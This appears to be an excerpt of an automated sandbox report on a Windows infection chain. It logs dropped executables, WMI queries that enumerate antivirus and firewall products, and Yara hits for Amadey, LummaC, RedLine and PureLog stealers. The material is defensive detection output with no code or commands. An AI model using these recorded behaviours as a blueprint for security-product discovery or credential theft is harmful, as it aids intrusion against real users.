Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_004079F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

13_2_004079F4

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_0019B010 GetUserNameA,

16_2_0019B010

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_001D2307 _free,_free,_free,GetTimeZoneInformation,_free,

16_2_001D2307

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_00197C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

16_2_00197C40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: gold.exe, 00000007.00000002.2695073102.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2912782673.0000000000C62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: axplong.exe, 00000006.00000003.2999105107.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3140584868.000000000167D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999421029.0000000001677000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001620000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 00000007.00000002.2695073102.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2912782673.0000000000C62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000009.00000002.2958183657.000000000675C000.00000004.00000020.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.3001121682.00000000069C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.Nework.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Nework.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2765127201.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2660197463.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2100199009.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2059876359.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2092244359.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2770476347.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3331845995.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2097277338.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2132657383.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2751757055.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2769327231.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED

Yara detected CryptOne packer

Source: Yara match

File source: 00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.gold.exe.37a5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
